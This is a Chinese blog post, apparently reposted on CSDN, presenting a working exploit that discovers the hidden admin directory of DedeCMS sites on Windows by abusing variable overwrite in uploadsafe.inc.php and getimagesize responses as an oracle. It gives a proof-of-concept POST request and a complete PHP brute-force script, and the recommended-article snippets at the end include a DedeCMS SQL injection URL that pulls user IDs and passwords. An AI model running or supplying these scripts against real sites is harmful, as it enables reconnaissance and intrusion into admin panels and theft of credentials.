dedecms 找后台总结_解决DEDECMS历史难题–找后台目录

最新推荐文章于 2024-04-22 23:56:52 发布
最新推荐文章于 2024-04-22 23:56:52 发布
阅读量129 收藏
点赞数
文章标签: dedecms 找后台总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_39623716/article/details/111846888
版权

利用限制

仅针对windows系统

进入正题

首先看核心文件common.inc.php 大概148行左右

if($_FILES)

{

require_once(DEDEINC.'/uploadsafe.inc.php');

}

uploadsafe.inc.php

if( preg_match('#^(cfg_|GLOBALS)#', $_key) )

{

exit('Request var not allow for uploadsafe!');

}

$$_key = $_FILES[$_key]['tmp_name']; //获取temp_name

${$_key.'_name'} = $_FILES[$_key]['name'];

${$_key.'_type'} = $_FILES[$_key]['type'] = preg_replace('#[^0-9a-z\./]#i', '', $_FILES[$_key]['type']);

${$_key.'_size'} = $_FILES[$_key]['size'] = preg_replace('#[^0-9]#','',$_FILES[$_key]['size']);

if(!empty(${$_key.'_name'}) && (preg_match("#\.(".$cfg_not_allowall.")$#i",${$_key.'_name'}) || !preg_match("#\.#", ${$_key.'_name'})) )

{

if(!defined('DEDEADMIN'))

{

exit('Not Admin Upload filetype not allow !');

}

}

if(empty(${$_key.'_size'}))

{

${$_key.'_size'} = @filesize($$_key);

}

$imtypes = array

(

"image/pjpeg", "image/jpeg", "image/gif", "image/png",

"image/xpng", "image/wbmp", "image/bmp"

);

if(in_array(strtolower(trim(${$_key.'_type'})), $imtypes))

{

$image_dd = @getimagesize($$_key);

//问题就在这里,获取文件的size,获取不到说明不是图片或者图片不存在,不存就exit upload.... ,利用这个逻辑猜目录的前提是目录内有图片格式的文件。

if (!is_array($image_dd))

{

exit('Upload filetype not allow !');

}

}

......

注意 $$_key这一句,变量 $key取自于 $_FILE,由于 $_FILE可控自然$key也可控,此处理论上是可以覆盖任意变量,但是前面有个正则判断不能出现 cfg_|GLOBALS。(但是应该还可以覆盖其他变量此处感觉还可以深挖)

本人出发点是找个可以利用<

但在这之前有个if(!defined('DEDEADMIN'))的判断,这个很好绕过设置 tmp_name为0或者1.jpg含.就可以绕过。

最后关键的一点就是要让文件存在还和不存在返回不同的内容就要控制type参数了。

当目录文件存在的时候 返回正常页面。当不存在的时候返回:Upload filetype not allow !

举个例子

文字不好表达,便于理解。

// ./dedecms/favicon.ico

if(@getimagesize($_GET['poc'])){

echo 1;

}else {

echo 0;

}

?>

get:

http://localhost/test.php?poc=./d

返回:1

http://localhost/test.php?poc=./a

返回:0

http://localhost/test.php?poc=./de

返回:1

http://localhost/test.php?poc=./ded

返回:1

........

构造poc

http://localhost/dedecms/tags.php

post:

dopost=save&_FILES[b4dboy][tmp_name]=./de

Common.inc.php 是被全局包含的文件,只要文件php文件包含了Common.inc.php都可以进行测试,以tags.php文件为例

当目录存在点时候: 图1

当目录不存在点时候: 图2

EXP:

$domain='http://localhost/dedecms/';

$url=$domain.'/index.php';

function post($url, $data, $cookie = '') {

$options = array(

CURLOPT_RETURNTRANSFER => true,

CURLOPT_HEADER => true,

CURLOPT_POST => true,

CURLOPT_SSL_VERIFYHOST => false,

CURLOPT_SSL_VERIFYHOST => false,

CURLOPT_COOKIE => $cookie,

CURLOPT_POSTFIELDS => $data,

);

$ch = curl_init($url);

curl_setopt_array($ch, $options);

$result = curl_exec($ch);

curl_close($ch);

return $result;

}

$testlen=25;

$str=range('a','z');

$number=range(0,9,1);

$dic = array_merge($str, $number);

$n=true;

$nn=true;

$path='';

while($n){

foreach($dic as $v){

foreach($dic as $vv){

#echo $v.$vv .'----';

$post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$v$vv

$result=post($url,$post_data);

if(strpos($result,'Upload filetype not allow !') === false){

$path=$v.$vv;$n=false;break 2;

}

}

}

}

while($nn){

foreach($dic as $vvv){

$post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$path$vvv

$result=post($url,$post_data);

if(strpos($result,'Upload filetype not allow !') === false){

$path.=$vvv;

echo $path . PHP_EOL;

$giturl=$domain.'/'.$path.'/images/admin_top_logo.gif';

if(@file_get_contents($giturl)){

echo $domain.'/'.$path.'/';

$nn=false;break 2;

}

}

}

}

?>

感谢

感谢给我提供这个思路的朋友

参考文章

【Python系列】Python模块filecmp 文件比较
优快云明星博主,认证博客专家,视频、Matlab领域优质创作者。
04-11 5086
### Date: 2017/4/11 ### Author: SoaringLee filecmp.cmp(f1, f2[, shallow]): 比较两个文件的内容是否匹配。参数f1, f2指定要比较的文件的路径。可选参数shallow指定比较文件时是否需要考虑文件本身的属性(通过os.stat函数可以获得文件属性)。如果文件内容匹配,函数返回True,否则返回False。...
解决DEDECMS历史难题后台目录
Coisini的博客
06-04 1146
利用限制 仅针对windows系统 进入正题 首先看核心文件common.inc.php 大概148行左右 if($_FILES) { require_once(DEDEINC.'/uploadsafe.inc.php'); } uploadsafe.inc.php if( preg_match('#^(cfg_|GLOBALS)#', $_key) ) { exit('Req...
python3从零学习-5.4.5、文件及目录的比较模块filecmp
山海皆可平z
05-13 246
源代码:Lib/filecmp.py filecmp模块定义了用于比较文件及目录的函数,并且可以选取多种关于时间和准确性的折衷方案。对于文件的比较,另见difflib模块。 filecmp模块定义了如下函数: filecmp.cmp(f1,f2,shallow=True) 比较名为f1和f2的文件,如果它们似乎相等则返回True,否则返回False。 如果shallow为真,那么具有相同os.stat()签名的文件将会被认为是相等的。否则,将比较文件的内...
Python3实现两个Excel文件内容比对
qq_43934844的博客
12-16 696
最近在工作中,需要人工比对大量的excel格式报表,刚好刚学了Pyhon入门基础知识,想着写个东西练练手,不但能提高代码编写能力,还能减轻工作量,提高工作效率。说干就干,简单的理了逻辑。首先,将目标表和源表的内容分别写入到字典中,Excel表中不确定有没有字段是唯一值,所以选择了行号作为key值,一行的内容放到list中,然后从源表中取一行去目标表中遍历。想好之后开始敲代码了,在代码编写过程中遇到很多的问题,都是遇到一个查一个。基本的比对功能实现后,就想着在加个日志记录下比对结果。
dedecms后台的一些经验[转]
weixin_30809173的博客
03-07 423
首先:注入exp有时候 有些/plus/目录换成了/plugins目录 /plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,...
DEDECMS后台目录有感
dfdhxb995397的博客
03-01 414
本文作者:红日安全团队——Mochazz 早上看了先知论坛的这篇文章:解决DEDECMS历史难题后台目录不得不说作者思路确实巧妙,作者巧妙的利用了Windows FindFirstFile和织梦程序代码中对上传图片的逻辑判断,成功在Windows环境下爆破出后台目录。可能一些人不了解Windows FindFirstFile,其实就是Windows在搜索文件时,使用到的一个win...
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 3309
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
渗透测试信息收集笔记(信息搜集、后台)
热门推荐
Y4tacker的博客
06-17 1万+
文章目录信息收集什么是信息搜集主动信息搜集与被动信息搜集信息搜集后的渗透流程信息收集的手段Whois信息(针对没有隐私保护URL)子域名利用搜索引擎site与inurl子域名挖掘机穷举爆破目标真实IPCDN介绍判断是否加了CDN具体操作无CDN有CDN:旁站与C段邮箱CMS类型敏感文件端口信息扫描全端口一般使用Nmap,masscan进行扫描探测服务器和中间件其他后台源代码Robots.txt扫描器Google搜索引擎其他问题 信息收集 什么是信息搜集 主动信息搜集与被动信息搜集 主动信息搜集是与目标主
DedeCMSV5.3常用问题手册中文CHM版最新版本
最新发布
12-08
DedeCMS的核心优势在于它对用户体验的重视,它提供了易于操作的后台管理界面,使得即便是没有深厚技术背景的用户也能够轻松管理和发布网站内容。此外,DedeCMS还支持多种插件和模块的安装,这些扩展功能进一步增强了...
DeDe织梦手册及数据字典
12-18
无论开发过程中遇到的是样式调整还是业务逻辑实现的难题,都可以在这些资料中到相应的解决方案。 综上所述,《DeDe织梦手册及数据字典》是一套为DeDe织梦开发人员量身打造的资源集,它不仅为初学者提供了一个快速...
python对比两个文件出不同并显示_python difflib模块实现两个文件差异对比,并输出html格式。(示例代码)...
weixin_39665507的博客
11-30 955
difflib 模块包含一些用来计算和处理序列之间差异的工具。它对于比较文本尤其有用,其中包含的函数可以使用多种常用差异格式生成报告。实现了三个类:SequenceMatcher 任意类型序列的比较 (可以比较字符串)Differ 对字符串进行比较HtmlDiff 将比较结果输出为html格式#!/usr/bin/env python##-*- coding: utf-8 -*-import di...
python比较两个文件的差异
weixin_33831673的博客
12-08 1773
使用python脚本比较两个文件的差异内容并输出到html文档中,可以通过浏览器打开查看。一、脚本使用对比nginx配置文件的差异python python_diff_file.py -f1 web26.conf -f2 web103.conf二、脚本内容#!/usr/bin/python #-*-coding:utf-8-*- """ 1.difflib的Html...
perl 下判断文件和目录是否为空?
bobo now~
11-13 1664
perl 下判断文件和目录是否为空?
linux何检查一个目录是否为空目录
weixin_33801856的博客
06-03 478
群里有朋友问我如何检查一个目录是否为空目录#!/bin/bash DIR=$1 if [ "$(ls -A $DIR)" ]; then echo "$DIR is not Empty" else echo "$DIR is Empty" fienjoyit! 转载于:https://blog.51cto.com/laoxu/1215322...
linux命令--如何判断一个目录是否为空
Chaolei3的博客
05-19 4775
参考: https://www.cnblogs.com/share23/p/14075705.html 背景 有一个需求:根据目录是否为空,决定是否将目录下的内容上传到其他目录中。 那如何判断目录下没有内容呢? 实现 在实现需求之前,首先得学习2个命令。 ls -a:all的缩写,会显示所有的文件,包括隐藏文件(以.开头的文件)以及2个特殊目录:“.” (目前目录) 及 “…” (父目录); ls -A:almost-all的缩写,会显示所有的文件,包括隐藏文件,但不包括不2个特殊目录:“.” (目前
Python对比两个文件夹的文件差异并导出差异
大猪的博客
10-21 3693
python脚本: # -*-coding:utf-8-*- #=============================================================================== # 目录对比工具(包含子目录 ),并列出 # 1、A比B多了哪些文件 # 2、B比A多了哪些文件 # 3、二者相同的文件: md5比较 #============================================================
Python——文件内容对比(可以生成HTML来观察结果)
不再疯要傻
11-13 4327
#/usr/bin/env python #coding=utf-8 #对比不同文件 #2015.11.12 #v0.0.0.1 import difflib import  sys import time try: #输入两个文件路径         textfile1=sys.argv[1]         textfile2=sys.argv[2
python进行文件拷贝及compare,并html形式输出差异
wdlnancy的专栏
05-08 901
python脚本: #coding:utf-8 __author__ = '**' import difflib import webbrowser import configparser from bs4 import BeautifulSoup # import pandas # import numpy import os from shutil import copyfile def...
dedeCMS后台UI样式二次开发新设计
资源摘要信息: "dedecms后台新样式开发指南" dedecms(织梦内容管理系统)是一款流行的开源CMS(内容管理系统),它广泛应用于企业的网站建设和管理。dedecms不仅提供了强大的内容发布和管理功能,还支持通过模板和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值